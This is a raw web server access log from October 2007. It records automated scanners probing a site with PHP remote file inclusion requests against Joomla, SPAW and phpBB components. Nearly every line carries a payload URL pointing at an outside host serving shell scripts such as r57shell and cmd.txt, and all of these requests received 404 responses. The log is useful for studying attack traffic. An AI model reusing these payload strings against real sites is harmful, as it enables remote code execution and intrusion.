201.160.36.7 - - [28/Oct/2007:14:01:02 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)"
66.225.253.129 - - [28/Oct/2007:14:01:49 -0700] "GET /logs/access_070826.log//shop/index.php?action=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:14:01:49 -0700] "GET /logs/access_070826.log//shop/index.php?action=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:14:01:49 -0700] "GET //shop/index.php?action=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:14:01:49 -0700] "GET //shop/index.php?action=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:14:01:49 -0700] "GET /logs//shop/index.php?action=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:14:01:50 -0700] "GET /logs//shop/index.php?action=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
68.180.250.111 - - [28/Oct/2007:14:01:54 -0700] "GET /logs/access_070716.log HTTP/1.0" 200 655360 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.1.205.128 - - [28/Oct/2007:14:03:27 -0700] "GET /logs/access.log//client/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
62.1.205.128 - - [28/Oct/2007:14:03:27 -0700] "GET /logs/access.log//billing/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
62.1.205.128 - - [28/Oct/2007:14:03:28 -0700] "GET //client/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
62.1.205.128 - - [28/Oct/2007:14:03:28 -0700] "GET //billing/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
62.1.205.128 - - [28/Oct/2007:14:03:28 -0700] "GET /logs//client/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
62.1.205.128 - - [28/Oct/2007:14:03:28 -0700] "GET /logs//billing/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
189.19.66.57 - - [28/Oct/2007:14:05:38 -0700] "GET //index2.php?x=http://no.spam.ee/~tonu/phpshell/r57shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:14:06:59 -0700] "GET /logs/access_070917.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:14:06:59 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:14:07:00 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.29.150.126 - - [28/Oct/2007:14:07:00 -0700] "GET /logs/access_070827.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.100.132 - - [28/Oct/2007:14:09:17 -0700] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://c0cac0larul3z.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.100.132 - - [28/Oct/2007:14:09:18 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://c0cac0larul3z.t35.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:14:10:57 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:14:10:58 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:14:10:58 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/new? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
204.11.234.20 - - [28/Oct/2007:14:10:58 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://smile.122mb.com/smile27.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
189.19.66.57 - - [28/Oct/2007:14:12:06 -0700] "GET //index2.php?x=http://no.spam.ee/~tonu/phpshell/r57shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
69.57.132.93 - - [28/Oct/2007:14:15:15 -0700] "GET /logs/access_070924.log//include.php?path[docroot]=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.57.132.93 - - [28/Oct/2007:14:15:15 -0700] "GET //include.php?path[docroot]=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.57.132.93 - - [28/Oct/2007:14:15:15 -0700] "GET /logs//include.php?path[docroot]=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
68.180.250.115 - - [28/Oct/2007:14:15:43 -0700] "GET /logs/access.log HTTP/1.0" 200 81675 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
189.19.66.57 - - [28/Oct/2007:14:15:54 -0700] "GET //index2.php?x=http://no.spam.ee/~tonu/phpshell/r57shell.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.111.176.32 - - [28/Oct/2007:14:17:07 -0700] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.32 - - [28/Oct/2007:14:17:08 -0700] "GET /logs/access_070820.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.30.214.235 - - [28/Oct/2007:14:17:31 -0700] "GET /logs/access_070806.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.57.132.93 - - [28/Oct/2007:14:18:21 -0700] "GET /logs//include.php?path[docroot]=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.57.132.93 - - [28/Oct/2007:14:18:21 -0700] "GET //include.php?path[docroot]=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.57.132.93 - - [28/Oct/2007:14:21:18 -0700] "GET /logs/access_071008.log//include.php?path[docroot]=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.66.114.245 - - [28/Oct/2007:14:24:17 -0700] "GET /logs/access_070730.log HTTP/1.0" 200 327680 "-" "-" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:14:26:52 -0700] "GET /logs/access_070826.log//billing/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:14:26:52 -0700] "GET //billing/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:14:26:52 -0700] "GET /logs//billing/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.225.253.129 - - [28/Oct/2007:14:26:55 -0700] "GET /logs/access_070826.log//billing/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:14:26:55 -0700] "GET //billing/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.225.253.129 - - [28/Oct/2007:14:26:55 -0700] "GET /logs//billing/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.111.176.32 - - [28/Oct/2007:14:27:08 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.32 - - [28/Oct/2007:14:27:09 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://ownz-you.com/kiddies/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.90.87.194 - - [28/Oct/2007:14:28:48 -0700] "GET //components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.viejitosoc.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.90.87.194 - - [28/Oct/2007:14:28:52 -0700] "GET /logs//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.viejitosoc.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.90.87.194 - - [28/Oct/2007:14:28:54 -0700] "GET /logs/access.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.viejitosoc.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
70.90.87.194 - - [28/Oct/2007:14:30:10 -0700] "GET /logs/scripts.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.viejitosoc.com/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.192.68.61 - - [28/Oct/2007:14:30:33 -0700] "GET /base.php?phpbb_root_path=http://stevenssharks.com/webcalendar/ws/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.121.130 - - [28/Oct/2007:14:31:41 -0700] "GET /logs/access_070917.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.121.130 - - [28/Oct/2007:14:31:41 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.53.121.130 - - [28/Oct/2007:14:31:41 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://keplek.100webspace.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
204.14.110.100 - - [28/Oct/2007:14:32:38 -0700] "GET //index.php3?s=http://freewebs.com/lamercrew/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.19.176.145 - - [28/Oct/2007:14:33:47 -0700] "GET /logs/access_070730.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.19.176.145 - - [28/Oct/2007:14:33:48 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.19.176.145 - - [28/Oct/2007:14:33:48 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.57.132.93 - - [28/Oct/2007:14:37:23 -0700] "GET /logs/access_070826.log//include.php?path[docroot]=http://www.ylas.co.kr/bbs/script/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.58.161.133 - - [28/Oct/2007:14:38:24 -0700] "GET /logs//oneadmin/config.php?path[docroot]=http://e-golld.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.161.133 - - [28/Oct/2007:14:38:25 -0700] "GET //oneadmin/config.php?path[docroot]=http://e-golld.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.19.176.145 - - [28/Oct/2007:14:39:09 -0700] "GET /logs/access_070827.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
216.127.76.96 - - [28/Oct/2007:14:39:32 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
216.127.76.96 - - [28/Oct/2007:14:39:32 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
216.127.76.96 - - [28/Oct/2007:14:39:32 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
66.249.73.202 - - [28/Oct/2007:14:40:04 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
66.249.73.202 - - [28/Oct/2007:14:40:04 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
216.127.76.96 - - [28/Oct/2007:14:40:31 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:41:27 -0700] "GET /logs/access_070826.log/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
211.233.38.51 - - [28/Oct/2007:14:41:27 -0700] "GET /index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:41:28 -0700] "GET /logs/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:42:16 -0700] "GET /logs/access_070826.log/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:42:16 -0700] "GET /index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:42:16 -0700] "GET /logs/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:42:36 -0700] "GET /logs/access_070826.log/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:42:36 -0700] "GET /index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:42:36 -0700] "GET /logs/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.85.47.250 - - [28/Oct/2007:14:43:04 -0700] "GET /logs/access.log//client/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.85.47.250 - - [28/Oct/2007:14:43:06 -0700] "GET //client/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.85.47.250 - - [28/Oct/2007:14:43:10 -0700] "GET /logs//client/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
211.233.38.51 - - [28/Oct/2007:14:43:38 -0700] "GET /logs/access_070826.log/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:43:38 -0700] "GET /index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:43:39 -0700] "GET /logs/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.85.47.250 - - [28/Oct/2007:14:44:17 -0700] "GET /logs/access.log//billing/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.85.47.250 - - [28/Oct/2007:14:44:18 -0700] "GET //billing/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.85.47.250 - - [28/Oct/2007:14:44:21 -0700] "GET /logs//billing/header.php/step_one.php?server_inc=http://qlzr.net/links.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.79.200.190 - - [28/Oct/2007:14:45:07 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
64.79.200.190 - - [28/Oct/2007:14:45:07 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.79.200.190 - - [28/Oct/2007:14:45:07 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://80.50.253.90/upload/071011004039p/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.79.200.190 - - [28/Oct/2007:14:45:07 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=ftp://ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.72.112.110 - - [28/Oct/2007:14:45:31 -0700] "GET /logs//login.php?dir=http://rh4m4.t35.com/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.72.112.110 - - [28/Oct/2007:14:45:31 -0700] "GET //login.php?dir=http://rh4m4.t35.com/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
72.55.133.70 - - [28/Oct/2007:14:45:57 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.55.133.70 - - [28/Oct/2007:14:45:57 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.192.68.61 - - [28/Oct/2007:14:46:00 -0700] "GET /logs/access_070716.log/base.php?phpbb_root_path=http://stevenssharks.com/webcalendar/ws/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.192.68.61 - - [28/Oct/2007:14:46:00 -0700] "GET /logs/base.php?phpbb_root_path=http://stevenssharks.com/webcalendar/ws/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:46:16 -0700] "GET /logs/access_070826.log/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:46:16 -0700] "GET /index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:46:17 -0700] "GET /logs/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.127.76.96 - - [28/Oct/2007:14:47:54 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
216.127.76.96 - - [28/Oct/2007:14:47:54 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
207.44.188.10 - - [28/Oct/2007:14:48:24 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.188.10 - - [28/Oct/2007:14:48:24 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.188.10 - - [28/Oct/2007:14:49:40 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
216.127.76.96 - - [28/Oct/2007:14:49:40 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
216.127.76.96 - - [28/Oct/2007:14:49:40 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
207.44.188.10 - - [28/Oct/2007:14:49:41 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
211.233.38.51 - - [28/Oct/2007:14:49:44 -0700] "GET /logs/access_070826.log/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:49:44 -0700] "GET /index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:49:45 -0700] "GET /logs/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
211.233.38.51 - - [28/Oct/2007:14:49:48 -0700] "GET /logs/access_070826.log/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:49:48 -0700] "GET /index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:49:49 -0700] "GET /logs/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:49:55 -0700] "GET /logs/access_070826.log/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:49:56 -0700] "GET /index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.233.38.51 - - [28/Oct/2007:14:49:56 -0700] "GET /logs/index.php?action=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
201.160.36.7 - - [28/Oct/2007:14:50:02 -0700] "GET /cendoc.php HTTP/1.1" 404 275 "http://www.lesbianas.tv/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.galf.org"
72.55.133.70 - - [28/Oct/2007:14:50:16 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.55.133.70 - - [28/Oct/2007:14:50:16 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.superlab.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
